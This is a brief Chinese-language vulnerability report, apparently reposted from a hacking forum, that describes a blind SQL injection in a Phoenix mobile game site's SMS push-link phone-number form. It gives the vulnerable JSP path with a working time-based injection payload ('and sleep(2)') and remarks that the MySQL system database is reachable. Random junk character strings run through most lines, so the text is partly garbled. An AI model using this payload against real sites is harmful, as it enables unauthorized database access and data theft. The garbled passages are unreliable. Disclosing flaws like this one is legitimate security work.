简要描述:
; B+ R# y. H: W凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。; N# j" H$ v7 r$ ^* }
0 J" |; U: O4 J6 K( l' a! Z4 h
详细说明:
: u) }$ \* T+ Z6 u% N存在SQL盲注url:
# R9 |% Z# `6 f& U2 Q! Nfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=18 u5 f2 u8 k1 m5 V" {+ O# J: u! J
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
4 \5 s9 J3 W# @/ b/ u9 Phttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
1 t j$ K# p0 p9 Shttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg n Y5 o2 D" a6 ?1 ]7 U( `
5 ~* |; b; k7 ^% m' F) P1 e# \- K能看到mysql系统数据库,看来user权限应该很高的。。 |